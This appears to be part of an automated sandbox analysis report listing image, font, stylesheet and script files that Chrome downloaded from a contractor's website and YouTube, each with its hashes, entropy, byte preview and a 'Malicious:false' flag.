                                              URL:https://www.citydiamondcontracting.com/uploads/projects/5/37ea8047a2494b50f7dc694b8f8dcf37.webp
                                              Preview:RIFFtG..WEBPVP8X..............VP8 .G..PZ...*....>.l.Q.%...v.s...bn..;i... ...5.....7yq..EE...........s...<.s.........{....z.....f.g...|...)O{.y.#......a....}N.................y...:...(.....!...9.....c...>........=....?...............e...W....V...................w...........<....q....Q.....u.......=..,...N..#>:.84U.x ...L.'.G5.....IE.(.@..G.9..lCb)...j.FXE.....o.ft.`.`.H5.....-Mn..&.9s...[5.C..i...G.J..;...s'h...k....'.) .....94..IF46......Z.d.......c>.u.%...Q...].V......!.s......C..X@.B...'.>i.[U..d.'7..._..iU.-.C.U..&.q.6&u.\..:..N.b=L3<..b...2...(...`90...Fi.6n.j.."M..=.u.Oz.rcLK...4..Y...I2o..e.!.;.F\...{7n.\..."A.{-L^..ts...X.:eR..b.2...F..8.........I....B.4&..R;)....n?r........m.` ..Dy..q.'[w..l....|.a..l~)_R...V..S.....ot.Wf.....1..,..m....F..V..Kd.._._qb.8..7......q..../|..PR....|..c...9......:.A...u.........k....7.>o.W. .?.."..MK.#..E.E....^.]..V.T.XY.H*.......*8`b..\>.%r........D$.b.:..BC^...50A.n.Cz..d.........,.l..95......"md...{...k.....F.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 225 x 225, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):4787
                                              Entropy (8bit):7.900057661601453
                                              Encrypted:false
                                              SSDEEP:96:g+TpY7Vfhyets12eWJrFfElsTF7dXIbbK9eBAkGTGnFGB:3wVZyj12ewFTFpYbBDCio
                                              MD5:61D0908DA0BC284F297C2CE6A61647A7
                                              SHA1:08B574C7432DEB4D338BCEEA22B35D8CE8F26F63
                                              SHA-256:AAE63A9351072889879D6F8BAA53FDA9E41F5DE5E44DD048D1709B545758A31B
                                              SHA-512:5C8E493A5656B43DC87CA609FA6ECBC0EBF5F8D34F92C9694CBFFADFB1DA0018B0FBE41EFB3863D471AABBC6F4EADF4F6FFC24004AB0B2CAF21FF894078B5A89
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR..............m"H....PLTE....F>.....f.k..m.%&.F......v....#."3."3..."2.....L........g.....I...."2."2...."1.....g.q...K."4.."....o...L.x............P....&.f.!.C...!.H.=4...........K....x............Q......m.r....|v.ga......6,.ZS..............}..q....'.........mw....Ua..........&v.{.......................nt.$&.LQP... .9=.tn......}#)`.r.....E.XK....<..}..S.....g..p...Q.....;F....LV.`h1..`..O.eO.{..............s.Zof>..|..PqL3....s1'i._...k..../N.p..9k.W..S..k...|....|..J.T..y..N.ql.....z.O......\i.P?.o..h.(a....pIDATx...._[.....J$....6..]2.)Ih0.-y...C-.S.tB..bb.:@.[g\,..n.h.k....9.>Q..K..|~.........9...fSQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ.H.>........e../...n..1.S.......83.P....p.N3.u...#$z.......~...@ .7l.A..Q.....t.,.~......."..|...>U.5.J.3...3..v..3....0.6.l.f.i8!.qD{....%6...Q...4.....s!CiD{..9+l4..h..m.....?.U@..mo_...F.:.....Lx.(.....l.x.1Lm4...i>.d@.a..5..%.......l...........O.Ah6Lic...Hi4..'..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):15928
                                              Entropy (8bit):7.982598139347404
                                              Encrypted:false
                                              SSDEEP:384:VVdmp18SaP9hR0Grc2yBh9ZeTCkqePX2c9SR2YFdL+MzRABNrpzOYOptqk:5mpKSUhbon9YX29oYFdUNrpzOuk
                                              MD5:D04783F82F3FE40E55CC40188885BDC2
                                              SHA1:B9B1B1BAC64975EC944E42D7F917EE7559379611
                                              SHA-256:8C4A449A67537E22A9C39E99B308A450CADC017D21BD97E41607840A8F23E5A1
                                              SHA-512:6D1EB676822D72BBA0D48039A1AED22F43999E508B4B626FC7DA062EF0B1DE87EE718CD6C4D7A4957EC6501D8E86268EF136FC300DC841928CC750D7F7187823
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF0>..WEBPVP8L#>../..?...m%.=...J...(.|..c..6...D..C..P........3.m+.{.w.NO.i.V,......?.P,..B......,#o..b..#P.U.Yx. .@.......h...U.R.@.T.....)..).J....3.?.."J.`.+.!Q.S.(...NiL"S*....$....Z..B...-.........._..}|2.d.?..Zn..C.....<....,. V..&L.A..Jf8:......F.;...c.....I.....D.HB..a..T.....t.rym..2.O...%...0...KD.!..T..3..1SD...J../Q..iw_...../f.......%.7..s.8$.J...I..8a.O..P.I/M....C3.T..hL...T.*..!"2E?E...8.M........'..!u...i..Q..)".L...(`:..h..I^..D....TA.aO..b.4...Wml..v.J....(N..G.LR$.,S4...`.T.NH).XS......f8..HS].Qk..K....r......8JC.....n.G..D.K...yyC........:....?........).....oY.......`.c.<.ZX.0....1.9.af..p...K.J..jq"2... .3.........Q=..p.....h^..k.....).OC>.0)G..q...Z.wjm.F....Rw..z.....7..1K.&..dlZMIP.S].4.m..vTo.h_.a.Jw..K.g...1....3..3.\C$1.4%.+q...4N.J..G.m.h.}._....U....T.....4.......R.}F.r.[b..YQv...+v..L....Kc ..x4..XE.N.R.F.`.*.$..m..4.4..2....../.u...1..A.8.,..6....2.3.......h.q.;.G....k..N;.w....u..M2C..At..G..1V.t.f.F.H
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (4599)
                                              Category:dropped
                                              Size (bytes):242785
                                              Entropy (8bit):5.694550757163063
                                              Encrypted:false
                                              SSDEEP:3072:tYjmEMff7T2m2xbBx+Q7k9/u+3WZLo9pFZt9:tAmdwxvz7ko4WZLo9pLH
                                              MD5:9C7F2BF38E74C943D9D73E38B1042544
                                              SHA1:432C5C2CB5A5B58C35114BFBBEAE3C701BC3AC16
                                              SHA-256:E3BAB8703D23B4A6342BB78CE8E9025EA8673C1C22C26A29BFFFF4A5184CC521
                                              SHA-512:371841087F95881EE45F51E09D5599659C8265F0A8A7731DB8FC429CA793B59141077C038CD0904AAD91B85268EE6FDCEC3B98700A11FA986236843E6C6FBD7B
                                              Malicious:false
                                              Reputation:low
                                              Preview:(function() {'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function ea(a){return function(){return this[a]}}function fa(a){return function(){return a}}var m;function ha(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ia=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ja(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var la=ja(this);function p(a,b){if(b)a:{var c=la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ia(c,a,{configurable:!0,writable:!0,value:b})}}.p("Symbol",function(a){function b(f){if(this instanceo
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (543)
                                              Category:downloaded
                                              Size (bytes):120870
                                              Entropy (8bit):5.457739714604933
                                              Encrypted:false
                                              SSDEEP:3072:Z8IHJFmdKFYJb5AChWTa8sr+1AZ1OiE3uprmY0HO0:eSHmdKF6b5AChWG8sr+1AZ1OiE3uprmH
                                              MD5:623A3FAEBCF826AF96A9411065A3D6DA
                                              SHA1:3AD6D7E756ED4456F8A9119D8F34AB1AA5ADE70B
                                              SHA-256:811B5FBB77A4AF9DCE1AFAA7975907EB27884AED3A7E904338E652DF263DD3BD
                                              SHA-512:1B47A25CE33BED6C58FF8889D780B0A24B08FFAF4E1975F311CDFFF2E397465546A134326130501236A08E8D68419B55BEF5895EB08934E803841A1436372C95
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.youtube.com/s/player/b0557ce3/player_ias.vflset/en_US/remote.js
                                              Preview:(function(g){var window=this;'use strict';var d7=function(a){g.xk(a,"zx",Math.floor(Math.random()*2147483648).toString(36)+Math.abs(Math.floor(Math.random()*2147483648)^g.Ya()).toString(36));return a},e7=function(a,b,c){Array.isArray(c)||(c=[String(c)]);.g.iha(a.D,b,c)},Erb=function(a){if(a instanceof g.jn)return a;.if(typeof a.Hm=="function")return a.Hm(!1);if(g.Ra(a)){var b=0,c=new g.jn;c.next=function(){for(;;){if(b>=a.length)return g.p1;if(b in a)return g.kn(a[b++]);b++}};.return c}throw Error("Not implemented");},Frb=function(a,b,c){if(g.Ra(a))g.kc(a,b,c);.else for(a=Erb(a);;){var d=a.next();if(d.done)break;b.call(c,d.value,void 0,a)}},Grb=function(a,b){var c=[];.Frb(b,function(d){try{var e=g.Jp.prototype.B.call(this,d,!0)}catch(f){if(f=="Storage: Invalid value was encountered")return;throw f;}e===void 0?c.push(d):g.mma(e)&&c.push(d)},a);.return c},Hrb=function(a,b){Grb(a,b).forEach(function(c){g.Jp.prototype.remove.call(this,c)},a)},Irb=function(a){if(a.oa){if(a.oa.locationOverri
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):12265
                                              Entropy (8bit):7.591221960010426
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwvZBz5onzkQ8sZDSIjMXZ95EfVVyqzlApeJ:4YNg7vZB/sdZjMv5+VyMlAc
                                              MD5:06E6B05DC75A72F2CF70F2654B4FE8A2
                                              SHA1:C964A1D78A68C30E756C10CD74A1F0ABBAD1F03F
                                              SHA-256:BDAFF245677B12896DCB29900F3BEA263B8991FAB4BA254BFE80C5CAB151CEF4
                                              SHA-512:F60799BD9E0772D3F2C133FB1D92E37314819BAB100DF9DC5EE8619B7394B4439741007DCDD88D72514DE95747BC8E9CEB9EBAEA65878054F4DE98989E206052
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/15/6c129810768a62552c68ec890060bf78.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                              Category:downloaded
                                              Size (bytes):388748
                                              Entropy (8bit):5.182833267031374
                                              Encrypted:false
                                              SSDEEP:1536:Mfi8ZHMCbS/mgV2B8ILJPptpJKztM6oyi+MOn4y6Ox5juDEnXrDJc7MsByDn+TEn:Mfi8Zimg0BtSoy9uf7LcSQoYN
                                              MD5:6BC73BD4E74E8993220F45682B0B7388
                                              SHA1:B55A53124024B3DDE36AAAB12B5C7DDA75C891F9
                                              SHA-256:716369DC2BA3761FAAABC317E82A604CFD41BB687251C981A267D4AE96A9C71D
                                              SHA-512:AD9E315D5762581CA2EAA4123CB6934D3E43861E0C22AE553C6AEB053B1823BA4CC57CB98ABFFDD5268B3089C38BFEF8B76F014B70512D72146ACD106826A73C
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.youtube.com/s/player/b0557ce3/www-player.css
                                              Preview:@charset "UTF-8";.html5-video-player{position:relative;width:100%;height:100%;overflow:hidden;z-index:0;outline:0;font-family:"YouTube Noto",Roboto,Arial,Helvetica,sans-serif;color:#eee;text-align:left;direction:ltr;font-size:11px;line-height:1.3;-webkit-font-smoothing:antialiased;-webkit-tap-highlight-color:rgba(0,0,0,0);touch-action:manipulation}.html5-video-player,.ytp-contextmenu{-ms-high-contrast-adjust:none;forced-color-adjust:none}.html5-video-player:not(.ytp-transparent),.html5-video-player.unstarted-mode,.html5-video-player.ad-showing,.html5-video-player.ended-mode{background-color:#000}.ytd-video-masthead-ad-primary-video-renderer .html5-video-player:not(.ytp-transparent),.ytd-video-masthead-ad-primary-video-renderer .html5-video-player.unstarted-mode,.ytd-video-masthead-ad-primary-video-renderer .html5-video-player.ad-showing,.ytd-video-masthead-ad-primary-video-renderer .html5-video-player.ended-mode{background-color:transparent}.ytp-big-mode{font-size:17px}.ytp-autohide{cu
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):17262
                                              Entropy (8bit):7.741279546588301
                                              Encrypted:false
                                              SSDEEP:384:4YNg7oVTxZV6W7Iu50NpxVB3fuNwH+gL6c7:4YyFu+3fuN/g9
                                              MD5:02752CA89DFB96A5EB6A06D617C3E3BA
                                              SHA1:B6FBA4284B7A3E5672571883C62C3B8164388E4C
                                              SHA-256:2696044EFBB7C92F885E701204C6FC2131FE41C661C43F89BF11F9EB6601663E
                                              SHA-512:E9D4C61B023A6543E5D77047B019F70C3001938BBD14E2EE552E9BB1C4F8FAE429473501FA5C633FCA3DB071E3728D94400A73E10978C75DC015E9C2C4A9109B
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):14393
                                              Entropy (8bit):7.658645511163834
                                              Encrypted:false
                                              SSDEEP:384:4YNg7wz6tHkcNQg2D1ITTScipGK97yWQMR7:4YyEzS5SneTApWnw
                                              MD5:4D66B37D7AF4EE8096C50B71C3F8A8E3
                                              SHA1:D902C05D71F6121CCF4862F604E6B13BCE35ADB3
                                              SHA-256:06501106B5D04F91FE5891A8D59711E07A45D08288BBA408629A5D881B719537
                                              SHA-512:43D65E2399781129452BF1B574008EB7B8493A39CA747212882526315BA61F17467ED8C7D4750C6495E7BAFC7F56CEFD2B6E02A083CBE5EAF90BF5C742BCD1B4
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/69/27bb04333d90251d4a59d0f27103206c.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):6032
                                              Entropy (8bit):7.9565436739834965
                                              Encrypted:false
                                              SSDEEP:96:VFo5xQ8vAjV4ozIMuMPPih+7kqJU25vaHK+qrI/8BTZ0OQjlzqA4cKhAcE5oom1:VFSxnsV1nuGL75JU2eqE/WTZUP4JvEed
                                              MD5:7D9A7D9F071E22A1BB998A3BB415F943
                                              SHA1:3F7333A3F807CA22C58F34F54E97894D9528A7F2
                                              SHA-256:8C1607ED026DDD2597553346594EA76E7B8CAA1183E2C42EE9F34E26A89FCEFD
                                              SHA-512:318FE7C881C5C1C3E6F4D118B13A59D47770AA6232A4160A46E58A051D78170C1E8580F5C3287A9035AA0185DB0B5A65FE1D5F99C6E7D6D163DE71C7B2FE49E1
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/prestashop.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE..........nRTSPRQ...............LNM......TVV....................v...WXX...................v`..............m.........GHG.......................}..........Q.................*+(GSV......Z[[..m.........S..[]UV..u..g...........SNT?IM.................565^^aTJH.....,.....r.q[...YSN...~zz........^v.MZb..=.....Z....7qqo#..@?<......gfcVlr...p.........x..l.......I.....?...............V..h...L..?k.......z].-...yV....Cc..u......)].{...../.E.....9t.p........|Sp.|...kIDATh..ko.Z...........%..a......A`..8....HC.D.L.$R+E..p...y....,..`g?{.w]66..s..%f....g7.L&..Z.a.K..G..b.V.&.".~.....\.(.....X.h^.......t^..t]U.....`...*...'.dK>..u.!...f.<....H{:.Tu]QTE.8.C1.G....n7..+.Z2..EO..D.. ..,B`.P......yJ.B.L...?..d2.p.Q.U..kn..J.+.b])..h..f.zH..2...@..Y.x...1A...H...."....vwZ...F,.....1.q\D....y..>:.F..ze.XSIx.>..<.....p8,.3.....'...l...V..d .z..+U......b.n$.....s..&\:.O..3.O.O..je*....b ..!.)6.~...e.X...W.F.P<......y..,..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):88374
                                              Entropy (8bit):7.991791782591795
                                              Encrypted:true
                                              SSDEEP:1536:t+timGr9GgXGwx+ttU85ThDmDIja7zR5FfGP65Sohh7m8rm:8tQzx+PUqlDHuzndGC5SGhiqm
                                              MD5:7E38A68B2B51F463FEE51D1FB14B5AE1
                                              SHA1:9ED31BAAC0E27E04462AB06423B8654DD2BBA949
                                              SHA-256:D483577F91577B02E44B15DF7E34AB61A7711B805D25277136546425EDD10BB8
                                              SHA-512:A6AB2F840154C7F785F50C124959CFFAA3AA2563A2B3560291BC6B10B5D04D4DFF09A8687F2B7AA3626F2B2D6E6C974552A9AC3FA05FD4F002D9911E5B8C7C77
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF.Y..WEBPVP8X..............ALPH*......m.I.....jW....... ....8....g.*.bI.F.H.....).,\$...h...`.@a7..Du..m.,....E...@.....mK...................'.1O..X....k...RDx.l[.$I..M.2....}D..`..[.m.m.m.{G...m.....A!(....nE.4....*..{..........h....7{..'.H....@..l.._.0,.....6k{.=.?.P..D.....r=FD.l.j.....d..`.......k.k...F.@..?@....a<..._...^4.y.\O.....v..z#..F..k......!.?.?.E#2.e.....pLk.....k.0.VFWk.I.A.4a.#....Z...,..(k%.K..[.8.>.}.Y&..v.1.4`...1c.Ni.......Z..<tW.G..z{;...]..X..9.:.Q..Il?F..\@ ....=.&..PFBIy......7.o......5.......v..[....nd.Kc.|.6..]..7...h..*{3}....d.Nr.!.e.&.#...C`.g..:..B...Ek...O..#....v..W..:.....?[f.@k.a..2.nWa.........v./.....]+`i.....|.Y]x.....w!.#$ ..#...........V."...rC.5O.....s..%..;S..3..X{..]..._......+....;....e.h]..QJSSD.."M...."......KW.Z+.3.Y..."@....|[..s....3`...e...|..L....*1gLd......-p&;..X+~....k.Xm....[. F2!......V[.w.lZv&>.2."%AQhE.`.....I....eq.J....n..o.=.?..ak.Q.9...qqL`..}.......3mS})W.+..^..6....D2.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):18615
                                              Entropy (8bit):7.770220822660111
                                              Encrypted:false
                                              SSDEEP:384:4YNg7PWem03q7qUfT755Ploqt8vCVKYSW8rQUpq:4YyzT2mUf/55tV8qMYZOpq
                                              MD5:34D38F9969AD7BF9DD28863A69E542E7
                                              SHA1:F768A4540B1BF57AE9C3D907C64FA0792DD2F13A
                                              SHA-256:8C2455D8B7AA7DCA09AB51D2EF56D230023BEB21340D25055AB40A272D2AAB7D
                                              SHA-512:88BCB0194691E07EEEF559CC4E64D60DA03193CEFDAD877E06412951ACF5DC83BB53785140D43FEC61A6D6CDFE427663AEC669F87E3B075784C0BB552B9325A1
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):56086
                                              Entropy (8bit):7.996338554799032
                                              Encrypted:true
                                              SSDEEP:768:1Y/CIe8scZ4z0csAMkBvXAbjn0FJ9bfXFOBEJi2N8y1hRTlWN8kwsbUBXaZO5wdL:1yCIeyaATSvXG0j5XFFvxRoNjw3Bf5U
                                              MD5:8BD7D6680E592EF3E7C1EDAC039D4C92
                                              SHA1:78452650B9CD6F465491FFC98E69BFAA791764B0
                                              SHA-256:AEA8ADAFDA82B886FF957E10591AEC80DC957EA9D4F18B045D66536F10FDBD56
                                              SHA-512:06D0010975C984FB13B965F83E87EEF686D41B62FD6C2213EE734E4F97C29305985B9193401489CCE6E9FEFE40019227EA248E76DB92F5189B0C85AA7DD595ED
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF....WEBPVP8X..............VP8 .....!...*....>.p.S)&=.$2.c...gm.._........B......F]|.|c.5.....&.~,.]I.M...W.......[.S./........w.:O.v..c....Z..h.R.GN............../....../.?....g.~3.+...................> ...OA.z.#..>..h............7.O._......V%._..&i..Q.3...Q.T..=..vD7.S..C......./...C.v...B.ie....n2*....%&.I..........SJ...#+,B.?.V?..(-'.E..G2]...,....`...1......s.SR...;...g..P..{na%[.0....J2@.A>....T.-R2<f..{.k.S..{... .#....o..I...j..h.Sn../A.......i.<....!.E....k...\.4z.o..q...l...G.@.I.2.4._.y...}....V......./.. ?..X...."M.Z.z.t &^e#d.;..]^X..@b.B(.o.....o.G..q....#..K..|M<6...e...........P.P.x].*...#C......cU8@..*.o@K.:../.....A'..I.#W...Ae......*.R;.......!./.y.N..T`.l......<J.......TEro:..C.. ...YnX....N0A...P.EQ..k....N..M.......bX.s......|.<Z.7p.XY.-i$>.dv..t..../4.L.^9f....e..........a..m+.X...r..w'.......<.u.^...,k.B.cu.":.7.6.8...x?.E....n...q..{.......*.........U..x.x..K=.M-......)*.:...........4...-A.....6...."..._.I.#.5.x973...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):64182
                                              Entropy (8bit):7.99551767247876
                                              Encrypted:true
                                              SSDEEP:1536:2bYy+eMgNpAXktn6SoA0nIzQKbHug35qqUQDk//VenJJO:gYyZMgz+anFILw3U4+/YJo
                                              MD5:16DFF002646E4A6141E24C4E53BD4269
                                              SHA1:B1A4509EFE0EA1C48422669AC1CEE727C463FB9F
                                              SHA-256:15881F397B5602C0181F9A398751D9A06A64444CFE3E81F699C3DBB152896D12
                                              SHA-512:AA954365829C0D82B2EDAA34B08825E8DBC6830B23A0AA594D42829881FE88894047CE08433E6E14DD6F55943ED565F48F2982B28F600A453482B2D1566C72BF
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/projects/25/9d9712f45a8ff4b4f837c7761f37a2b1.webp
                                              Preview:RIFF....WEBPVP8X..............VP8 :...p....*....>.p.R.&......p..en._/<...U... ....K.....<.<jc...g7...?.y.s.~2.fy7.7..6.!.O..Z................?.w.WD...Ng...~..L.Z.4.....X.._..}......}..i......,....c.......{....p|..o...~.~.~..g....;....`?4.%.9...7.7./..f.j........IF* .p.o~@U...^o..uU..E...u[..*.I...g.O.=....![.2..G.B....a.s:)..c2.....=..+.bz'H..J..;.>C.v.Q...L.h-.6...&tx.yP@..0<....o.....r.d...+7......_nw$Ce^..Qj......GDl..er....a.H...n..WU..+.|....Q.>1(.^..Y..!n.HY(......k-x.......Z...._..........Qd.%2].Zf.&G.N&..n.I.wJ.y.......P..y...F9nO.......e.Dq.yp..tFL...6.j.t/GM...K|..1.)Gsp...pO.t..!.B"F..M._..........d.;..Y.....jeC.8..... (..o...r.b.d....1.$.G.F.6R.q8.C.w...8...<...J....H.U..fO>CWW..u...^..D...d...^.@d. .# .....I/...c+...$......%?..@...)^.....ez...rK*.cm?{s.f#Fay(.B.[..*.k..#.#Pm.Q..{.`.^...@.Q)d.1.ALZeW.Q..H.>3.....#!.t...t....N....bV..T.d.......[....{.U].."z.~.]lw.T.O.E...a..S.........._...]...k.y..K......0...UzK....e._.C....q.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:Web Open Font Format (Version 2), TrueType, length 24376, version 1.0
                                              Category:downloaded
                                              Size (bytes):24376
                                              Entropy (8bit):7.991070160855579
                                              Encrypted:true
                                              SSDEEP:384:t7xtNx1nP7nxzKxS93jTnjRBAb37o/YkoqNkyeMNCVZN6iAwOUoD+AilTeC:Zxt1DnxzTTFab3aoqhNCo/X+lB
                                              MD5:FC03EDC2C67353B7608B593EE05565C6
                                              SHA1:72106071998B0EF5F145EA4F9D53459E52A33E9F
                                              SHA-256:14BE4114DCFDE74652F19F9FFAE8C9BB50707E9E88BD2B1FCD86FB50224109E7
                                              SHA-512:444759B488BD8724B40429E1B0E05C5E11A4A1B9A2DEFC03CDE8E9156E237510A943C4D24FE312E0C7A5FB3929F47222FE1D44027EC242A58087A0A57BE388D2
                                              Malicious:false
                                              Reputation:low
                                              URL:https://fonts.gstatic.com/s/manrope/v15/xn7gYHE41ni1AdIRggexSg.woff2
                                              Preview:wOF2......_8.........^..........................P..\...?HVAR.b.`?STAT....n/j........]..2.0..R.6.$..`. ..&..W.....5lw...@...d..F...coL.1.q......._......M.^."X.8....v.N,...e.."4.s.w.....;8...C../P.....sR...LgMf.d.....:.(hf.t......8.......*0vy.hW.x.y....}...".di~..?.RV,K..YO...,5.j.T.......f...B.%,!,!..!..b...H.A...1.....R..A...|....>....,.|J..Z.%EL......a..1...=.....X..v.....0......[..e..M.n....O$H..".$/....... .Rj...k.&1.Y....>]U?2S%U...z..B..-V...5.C..=..L L.>..1fB..??.,@.. .d.t..L.,3....~..qj.f...$..s...M(.l,*..&...D./...H'.....z..i.`.......p.a...r....a..T..x.i4..xd..2....Z.r.2w...|...5....Q.W"..`...4..zMWT.D"..i......R..k.o.0.L.3M09..0.n.pU..2Dq.4..\...........E.1.9r._.3.l}...j.o._.s.......B..I.F........2.7-..:...v.f..U%.h.L..#|..>.$.I...,<.}i..S..w7@......Y.h....Oo.....g.A..M."A..Y....#...3.&.....`..`*.>9....X.:.}{.=|.F......A..P%. }..($...EB.v.L.5*.=........R.Tz[.Y'....l...z..{.).b-.*.\FL..."*".....G...2.... AD........q#.&..v..pF..m.c.x
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):16355
                                              Entropy (8bit):7.7191585295920975
                                              Encrypted:false
                                              SSDEEP:384:4YNg7c3IvUkrEKvFg527en2jLgJgjudkq1507cp:4YyQGVFg5OgJKudkKmA
                                              MD5:41416DF74F2D9A35B29125B8E68702A6
                                              SHA1:D007E597BF6B8BADBAEA3786413486A0B0415C87
                                              SHA-256:241B4A65930A6A7FCC36ED0DBE7481B4B8F65BA835441248E42157B9D9ADF198
                                              SHA-512:94F3FE2F26B6F0CB1F1D983D081C7765605DA334AC9A77FD16AE8817F440BD1DC3B0E95AAA38230A6C40E8B346CC18FD0B72B047FFEEA5B0B043BEE1B0FB05C0
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/56/44d739a3dc26606dec5eb5ca88f44a23.jpg
